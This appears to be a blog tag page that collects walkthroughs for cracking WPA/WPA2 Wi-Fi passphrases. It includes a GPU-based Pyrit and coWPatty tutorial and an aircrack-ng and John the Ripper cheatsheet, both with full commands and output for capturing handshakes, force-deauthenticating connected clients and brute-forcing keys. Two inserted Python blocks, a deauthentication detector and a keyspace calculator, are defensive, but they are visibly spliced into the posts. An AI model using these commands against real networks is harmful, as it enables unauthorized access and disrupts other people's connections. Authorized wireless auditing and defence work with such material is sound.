All Entries Tagged With: "wpa"

WPA is hackable?

I attended a track at Blackhat last week in which it was shown that WPA can be hacked by using WEP. I know, it sounds quite ‘out there’, but it’s true. The good thing is this can only be done if WPA migration mode is still enabled. So, if you’ve done a WPA migration recently, or even just to check to make sure, turn off WPA migration mode and you should be good to go.

Here’s a link to Core Labs presentation: WPA Migration Mode: WEP is back to haunt you…

Cracking WPA FAST with video cards

From http://www.i-hacked.com – written by Notlist3d

By now, pretty much everyone has heard that it is easy to hack into WEP protected networks. As we have seen in our Cracking WEP article, it is terribly easy. (There have been advances in cracking WEP since that article was published, it is even easier now) Yeah, WiFi is inherently insecure, but we need it… Right? Well if you ask your local security guy how you can protect your home WiFi network, surely they will come back and say: “WPA or WPA2 cannot be cracked, use it”. They are wrong.

Because it could be deployed as a simple patch to existing hardware, WPA came in as the “Saving Grace” for wireless networking. It corrected almost every security problem either created or ignored by WEP. However, WPA was not perfect. The way WPA sets up its encryption keys (the 4-way handshake) can be captured and then attacked offline by brute force. Consequently, it’s actually easier to crack a WPA network that uses a weak password than it is to crack WEP. This article will walk you through the process of retrieving and cracking a WPA network key. In this guide I will skim over some of the powerful things that you can do with graphics cards. By focusing on my personal setup, you will see it can be done with limited off-the-shelf equipment.

The first decision is what you want your setup to be. I personally chose to go with a GeForce card with CUDA support (http://www.nvidia.com/object/cuda_learn_products.html ). Check that the programs you want to use support the graphics card you choose.

The setup I ultimately decided to go with is an EVGA 780i motherboard with dual SLI support (it can support tri SLI). I went with two GeForce GTX260 cards to use the SLI capability. I also upgraded my power supply to a Corsair 850W to power everything in my machine.

After building the setup, feel free to go play some games, then come back to this guide. I mean you have work to do!

The BackTrack 4 Pre-Release is a perfect platform for you to have some fun with your new setup. For a guide on configuring BackTrack 4 with CUDA and an in-depth tutorial on the CUDA tools, check out the 25-page guide by Pureh@te on the Offensive Security website.

Finally, let’s take a look at my favorite GPU tool, Pyrit (http://code.google.com/p/pyrit/), which lets you run a pass-through dictionary attack against WPA by piping its output into coWPatty (http://www.willhackforsushi.com/Cowpatty.html).

Using this, you can take a capture file containing a WPA 4-way handshake and pass it through to coWPatty to try to crack it with your dictionary. Make sure your dictionary only contains words between 8 and 63 characters long; anything shorter or longer is a wasted guess, because WPA passphrases must be in that range. One thing to keep in mind is that you can only crack the passphrase if it is actually in your dictionary file.

The first step will be to put your card into monitor mode. After that, fire up airodump. I happen to know the router BSSID and channel so here is what I did below.

airodump-ng -c (router's channel) --bssid (router's BSSID) -w (capture filename) interface

[screenshot: 1-airodump-01]

Airodump will then load up as shown below. You can see the router and data coming from it. You can see a client is connected, which is important since you will need to get the 4-way handshake to crack the WPA passphrase.

[screenshot: 2-airodump-02]

Next it is time to send a de-authentication packet to the client to make it reconnect to the router allowing you to grab that 4-way handshake.

aireplay-ng -0 (de-authentication attack) 5 (number of de-authentication packets to send) -a (router BSSID) -c (client MAC address) interface

[screenshot: 3-aireplay-2]

If all goes well, the top right corner of your airodump window will show that you have received a WPA handshake. I have circled it in red below. If you don’t see this, just repeat the last step and de-authenticate the client again.

[screenshot: 4-airodump-handshake]

After that I like to make sure that my graphics cards are working properly. You can either run a benchmark or list cores in Pyrit. In the picture below I show the benchmark option.

To run benchmark: pyrit benchmark

To list cores: pyrit list_cores

[screenshot: 5-pyrit-benchmark]

Below is the command for running pyrit in a pass-through mode through coWPatty. The great thing about this is you can run it with your dictionary file and not mess around with making a rainbow table or anything. If you do not have a dictionary file for WPA, you can grab one from the backtrack repository. Command is as follows for the pass-through mode.

pyrit -e (router ESSID) -f (path to the dictionary file) passthrough | (path to coWPatty) -d - -s (router ESSID) -r (name of capture file)

Note: I had installed the latest version of coWPatty manually. The default location you would put after the pipe (|) in backtrack would be /pentest/wireless/cowpatty/cowpatty

[screenshot: 6-pyrit]

If all goes well, you will start to see it go through the passphrases in your dictionary file, as shown below.

[screenshot: 7-pyrit-2]

And if all goes well in the end, you will end up with a passphrase as shown below.

[screenshot: 8-pyrit-final]

It was able to run 15,479.28 passphrases per second, which is an amazing upgrade from the 300-something I was getting with my 2.0 GHz dual-core processor. This is also with stock graphics cards that are not over-clocked.

Credits:

Tools used:

Backtrack – http://www.remote-exploit.org/backtrack.html

Pyrit- http://code.google.com/p/pyrit/

Cowpatty- http://www.willhackforsushi.com/Cowpatty.html

Special thanks to Pureh@te /Offensive Security for the great guide on getting graphic cards set up in backtrack – http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf

Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper

February 24th, 2009 | Author: Peter Van Eeckhoutte

Basic steps :

* Put interface in monitor mode
* Find wireless network (protected with WPA2 and a Pre Shared Key)
* Capture all packets
* Wait until you see a client and deauthenticate the client, so the handshake can be captured
* Crack the key using a dictionary file (or via John The Ripper)

I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.

First, put the card in monitor mode :

root@bt:~# airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

Ok, we can now use interface mon0.

Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet

Stop airodump-ng and run it again, writing all packets to disk :

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options: either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s force the deauthentication. We need the BSSID of the AP (-a) and the MAC of a connected client (-c).

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner.

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

Stop airodump-ng and make sure the files were created properly.

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
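From the defender's side, the deauthentication step above has an obvious on-air signature: the 64 directed DeAuth frames that aireplay-ng reports arrive within about a second, where a genuine disconnect is one or two frames. The following is an added example (not code from either post) that parses 802.11 management-frame headers and flags such bursts per AP/station pair; the capture is constructed inline using the BSSID and station MAC shown above, and the timestamps are assumed.

```python
import struct
from collections import defaultdict

DEAUTH_SUBTYPE = 0x0C  # management frame (type 0), subtype 12 = deauthentication

def parse_frame(raw):
    """Split an 802.11 MAC header into (type, subtype, addr1, addr2, addr3)."""
    fc = raw[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    a1, a2, a3 = raw[4:10], raw[10:16], raw[16:22]
    return ftype, subtype, a1.hex(":"), a2.hex(":"), a3.hex(":")

def find_deauth_bursts(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_frame). Returns {(bssid, station): n} for
    every AP/station pair with more than `threshold` deauth frames in any `window` seconds."""
    per_pair = defaultdict(list)
    for ts, raw in frames:
        ftype, subtype, dst, src, bssid = parse_frame(raw)
        if ftype != 0 or subtype != DEAUTH_SUBTYPE:
            continue
        station = dst if src == bssid else src  # a deauth may travel in either direction
        per_pair[(bssid, station)].append(ts)
    alerts = {}
    for pair, times in per_pair.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 > threshold:
                alerts[pair] = max(alerts.get(pair, 0), end - start + 1)
    return alerts

def build_frame(subtype, addr1, addr2, addr3, reason=7):
    """Constructed test helper: a minimal management frame header plus a reason code."""
    def mac(s): return bytes.fromhex(s.replace(":", ""))
    fc = bytes([subtype << 4, 0x00])  # version 0, type 0 (management), given subtype
    return fc + b"\x00\x00" + mac(addr1) + mac(addr2) + mac(addr3) + b"\x00\x00" + struct.pack("<H", reason)

# Constructed sample capture using the AP and station MACs shown on this page.
AP, STA = "00:19:5b:52:ad:f7", "00:1c:bf:90:5b:a3"
SAMPLE = [(0.5 + i, build_frame(0x08, "ff:ff:ff:ff:ff:ff", AP, AP)) for i in range(3)]  # beacons
SAMPLE += [(13.0 + i * 0.01, build_frame(DEAUTH_SUBTYPE, STA, AP, AP)) for i in range(64)]  # burst
SAMPLE.append((40.0, build_frame(DEAUTH_SUBTYPE, AP, STA, AP)))  # one genuine disconnect

if __name__ == "__main__":
    for (bssid, sta), n in find_deauth_bursts(SAMPLE).items():
        print(f"ALERT: {n} deauth frames for station {sta} on BSSID {bssid} within 1 s")
```

Enabling Protected Management Frames (802.11w) on the AP and clients makes forged deauthentication frames fail their integrity check, so they are dropped; the burst detector then still shows you that someone tried.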

From this point forward, you do not need to be anywhere near the wireless network. All cracking happens offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest walking away and finding yourself a cosy place where you can live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very, very long time. There are 2 ways of bruteforcing: one that is relatively fast but does not guarantee success, and one that is very slow but guarantees that you will find the key at some point in time.

The first option is by using a wordlist/dictionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the wordlist and feed it the .cap file that contains the WPA2 handshake.

So if your wordlist is called word.lst (under /tmp/wordlists), you can run

aircrack-ng -w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successful for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would have to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use:

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note: the PSK in my test lab is only 8 characters, and contains one uppercase character and 4 numbers). I will post the output once the key has been cracked, including the time it took to crack it.

That’s it.

Update: after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts:

8 characters, each a plain letter (lowercase or uppercase) or a digit = each character in the key could have 26+26+10 (62) possible values. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896. At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 years). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Audit.
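As an added example (not code from either post), here is the arithmetic behind both articles in working Python: the PBKDF2 derivation that makes every WPA/WPA2-PSK guess expensive (the "method in which WPA initializes its encryption scheme" from the first article), the keyspace and time-to-exhaust figures computed just above, and a quick rate measurement for the machine you run it on. The SSID TestNet and the 62-symbol alphabet come from the page; the 12-character row is an added comparison to show what passphrase length does to the numbers.

```python
import hashlib
import time

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit PSK/PMK the way IEEE 802.11i specifies: PBKDF2-HMAC-SHA1 with
    the SSID as salt and 4096 iterations. Every dictionary guess must pay this cost,
    which is why cracking is measured in guesses per second and why GPUs help so much."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)

def keyspace(length: int, alphabet_size: int) -> int:
    """Number of candidates for a passphrase of exactly `length` symbols."""
    return alphabet_size ** length

def time_to_exhaust(candidates: int, guesses_per_second: float):
    """(hours, years) needed to try every candidate at the given rate."""
    hours = candidates / guesses_per_second / 3600
    return hours, hours / (24 * 365)

def measure_rate(ssid: str = "TestNet", samples: int = 50) -> float:
    """Rough single-core CPU rate on this machine, in guesses per second."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"guess{i:04d}", ssid)
    return samples / (time.perf_counter() - t0)

def audit_table(rates):
    """For each (label, guesses/s) pair: years to exhaust an 8- and a 12-character passphrase
    drawn from the 62-symbol alphabet [A-Za-z0-9] used in the post's arithmetic above."""
    rows = {}
    for label, rate in rates:
        rows[label] = {n: time_to_exhaust(keyspace(n, 62), rate)[1] for n in (8, 12)}
    return rows

if __name__ == "__main__":
    # The two rates measured in the posts, plus one core of the CPU this runs on.
    for label, per_len in audit_table([("dual-core CPU (post)", 600),
                                       ("2x GTX260 via Pyrit (post)", 15479.28),
                                       ("this CPU, one core", measure_rate())]).items():
        print(f"{label:28s} 8 chars: {per_len[8]:>12.1f} years   12 chars: {per_len[12]:>12.3e} years")
    # Same passphrase, different SSID, different PMK: precomputed tables only work per SSID.
    print(wpa_pmk("password", "IEEE") != wpa_pmk("password", "TestNet"))
```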